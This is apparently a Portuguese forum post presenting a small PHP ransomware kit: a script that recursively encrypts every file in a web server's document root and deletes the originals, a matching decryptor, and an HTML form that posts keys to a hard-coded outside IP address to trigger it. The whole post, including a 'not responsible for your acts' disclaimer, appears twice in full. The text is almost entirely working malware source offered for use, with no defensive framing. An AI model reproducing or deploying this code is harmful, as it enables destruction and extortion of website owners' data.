Muitos já devem ter ouvido falar algo sobre ransomware mas poucos sabem seu funcionamento. Aqui vai uma dica no caso um pequeno ransoware em PHP:
1° Criptografando:
<?php
function encrypt_decrypt($action, $string, $secret_key, $secret_iv) { //Credits to some website which isn't up right now
$output = false;
$encrypt_method = "AES-256-CBC";
$key = hash('sha256', $secret_key);
$iv = substr(hash('sha256', $secret_iv), 0, 16);
if( $action == 'encrypt' ) {
return base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
}
else if( $action == 'decrypt' ){
return openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
}
}
function encfile($filename){
if (strpos($filename, '.aes.aes') !== false) {
return;
}
file_put_contents($filename.".aes.aes", (encrypt_decrypt('encrypt', (encrypt_decrypt('encrypt', file_get_contents($filename), $_POST['key1'], $_POST['iv'])), $_POST['key2'], $_POST['iv'])));
unlink($filename);
}
function encdir($dir){
$files = array_diff(scandir($dir), array('.', '..'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
encdir($dir."/".$file);
}else {
encfile($dir."/".$file);
}
}
}
if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
encdir($_SERVER['DOCUMENT_ROOT']);
}
?>
salve esse codigo como encrypt.php
2° Desencriptando
<?php
function encrypt_decrypt($action, $string, $secret_key, $secret_iv) {//Credits to some website which isn't up right now
$output = false;
$encrypt_method = "AES-256-CBC";
$key = hash('sha256', $secret_key);
$iv = substr(hash('sha256', $secret_iv), 0, 16);
if( $action == 'encrypt' ) {
$output = openssl_encrypt($string, $encrypt_method, $key, 0, $iv);
$output = base64_encode($output);
}
else if( $action == 'decrypt' ){
$output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
}
return $output;
}
function decfile($filename){
if (strpos($filename, '.aes.aes') === FALSE) {
return;
}
$encrypted2 = file_get_contents($filename);
$encrypted = encrypt_decrypt('decrypt', $encrypted2, $key2, $iv);
$decrypted = encrypt_decrypt('decrypt', $encrypted, $key1, $iv);
file_put_contents(substr($filename, 0, -8), $decrypted);
unlink($filename);
}
function decdir($dir){
$files = array_diff(scandir($dir), array('.', '..'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
decdir($dir."/".$file);
}else {
decfile($dir."/".$file);
}
}
}
$key1 = $_POST['key1'];
$key2 = $_POST['key2'];
$iv = $_POST['iv'];
if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
decdir($_SERVER['DOCUMENT_ROOT']);
echo "Webroot Decrypted";
}
?>
salve esse código como decrypt.php
3° criando a "tela"
<html>
<body>
<form method=POST action="http://45.32.119.24/main2.php">
Key 1:<br>
<input type="text" name="key1" value="YouAesKey1">
<br>
Key 2:<br>
<input type="text" name="key2" value="YourAesKey2">
<br>
IV:<br>
<input type="text" name="iv" value="YourIV">
<br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
salve como invoker.html
Aviso: eu não me responsabilizo por seus atos
1° Criptografando:
<?php
function encrypt_decrypt($action, $string, $secret_key, $secret_iv) { //Credits to some website which isn't up right now
$output = false;
$encrypt_method = "AES-256-CBC";
$key = hash('sha256', $secret_key);
$iv = substr(hash('sha256', $secret_iv), 0, 16);
if( $action == 'encrypt' ) {
return base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
}
else if( $action == 'decrypt' ){
return openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
}
}
function encfile($filename){
if (strpos($filename, '.aes.aes') !== false) {
return;
}
file_put_contents($filename.".aes.aes", (encrypt_decrypt('encrypt', (encrypt_decrypt('encrypt', file_get_contents($filename), $_POST['key1'], $_POST['iv'])), $_POST['key2'], $_POST['iv'])));
unlink($filename);
}
function encdir($dir){
$files = array_diff(scandir($dir), array('.', '..'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
encdir($dir."/".$file);
}else {
encfile($dir."/".$file);
}
}
}
if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
encdir($_SERVER['DOCUMENT_ROOT']);
}
?>
salve esse codigo como encrypt.php
2° Desencriptando
<?php
function encrypt_decrypt($action, $string, $secret_key, $secret_iv) {//Credits to some website which isn't up right now
$output = false;
$encrypt_method = "AES-256-CBC";
$key = hash('sha256', $secret_key);
$iv = substr(hash('sha256', $secret_iv), 0, 16);
if( $action == 'encrypt' ) {
$output = openssl_encrypt($string, $encrypt_method, $key, 0, $iv);
$output = base64_encode($output);
}
else if( $action == 'decrypt' ){
$output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
}
return $output;
}
function decfile($filename){
if (strpos($filename, '.aes.aes') === FALSE) {
return;
}
$encrypted2 = file_get_contents($filename);
$encrypted = encrypt_decrypt('decrypt', $encrypted2, $key2, $iv);
$decrypted = encrypt_decrypt('decrypt', $encrypted, $key1, $iv);
file_put_contents(substr($filename, 0, -8), $decrypted);
unlink($filename);
}
function decdir($dir){
$files = array_diff(scandir($dir), array('.', '..'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
decdir($dir."/".$file);
}else {
decfile($dir."/".$file);
}
}
}
$key1 = $_POST['key1'];
$key2 = $_POST['key2'];
$iv = $_POST['iv'];
if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
decdir($_SERVER['DOCUMENT_ROOT']);
echo "Webroot Decrypted";
}
?>
salve esse código como decrypt.php
3° criando a "tela"
<html>
<body>
<form method=POST action="http://45.32.119.24/main2.php">
Key 1:<br>
<input type="text" name="key1" value="YouAesKey1">
<br>
Key 2:<br>
<input type="text" name="key2" value="YourAesKey2">
<br>
IV:<br>
<input type="text" name="iv" value="YourIV">
<br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
salve como invoker.html
Aviso: eu não me responsabilizo por seus atos